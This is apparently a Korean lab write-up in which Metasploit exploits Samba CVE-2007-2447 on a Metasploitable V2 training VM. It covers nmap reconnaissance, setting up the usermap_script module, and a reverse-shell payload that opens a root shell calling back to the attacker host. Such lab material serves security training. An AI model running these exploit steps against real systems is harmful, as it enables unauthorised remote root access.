Metasploitable V2 Linux 취약성 ( samba )

- 사용 시스템 

KaliLinux

Metaspolitable V2 Linux

- Samba bug

Exploit CVE 2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking externals scripts defined in smb.conf.

- 실습

1. samba 서비스 확인

# nmap -sV 192.168.17.134

Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-15 18:16 KST Nmap scan report for 192.168.17.134 Host is up (0.00028s latency). Not shown: 977 closed ports PORT     STATE SERVICE     VERSION 21/tcp   open  ftp         vsftpd 2.3.4 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp   open  telnet      Linux telnetd 25/tcp   open  smtp        Postfix smtpd 53/tcp   open  domain      ISC BIND 9.4.2 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp  open  rpcbind     2 (RPC #100000) 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp  open  exec        netkit-rsh rexecd 513/tcp  open  login? 514/tcp  open  tcpwrapped 1099/tcp open  rmiregistry GNU Classpath grmiregistry 1524/tcp open  shell       Metasploitable root shell 2049/tcp open  nfs         2-4 (RPC #100003) 2121/tcp open  ftp         ProFTPD 1.3.1 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open  vnc         VNC (protocol 3.3) 6000/tcp open  X11         (access denied) 6667/tcp open  irc         UnrealIRCd 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3) 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.78 seconds

2. msfconsole 공격

msf > search samba Matching Modules ================    Name                                            Disclosure Date  Rank       Description    ----                                            ---------------  ----       -----------    auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal    auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow    auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow    auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow    auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules    auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State    exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)    exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)    exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow    exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow    exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)    exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow    exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution    exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow    exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)    exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow    exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)    exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution    exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution    exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution    exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow    exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow    exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource    post/linux/gather/enum_configs                                   normal     Linux Gather Configurations msf > use exploit/multi/samba/usermap_script  msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script):    Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    RHOST                   yes       The target address    RPORT  139              yes       The target port (TCP) Exploit target:    Id  Name    --  ----    0   Automatic msf exploit(usermap_script) > set RHOST 192.168.17.134 RHOST => 192.168.17.134 msf exploit(usermap_script) > show payloads Compatible Payloads ===================    Name                                Disclosure Date  Rank    Description    ----                                ---------------  ----    -----------    cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)    cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)    cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)    cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)    cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)    cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6    cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)    cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6    cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)    cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6    cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)    cmd/unix/generic                                     normal  Unix Command, Generic Command Execution    cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)    cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)    cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)    cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)    cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)    cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)    cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)    cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)    cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)    cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)    cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)    cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)    cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)    cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)    cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh) msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(usermap_script) > set LHOST 192.168.17.50 LHOST => 192.168.17.50 msf exploit(usermap_script) > exploit [*] Started reverse TCP double handler on 192.168.17.50:4444  [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo PXycaId34m4NVQEE; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "PXycaId34m4NVQEE\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.17.50:4444 -> 192.168.17.134:50594) at 2017-11-15 18:19:12 +0900 hostname metasploitable id uid=0(root) gid=0(root)

> root 권한을 얻었다.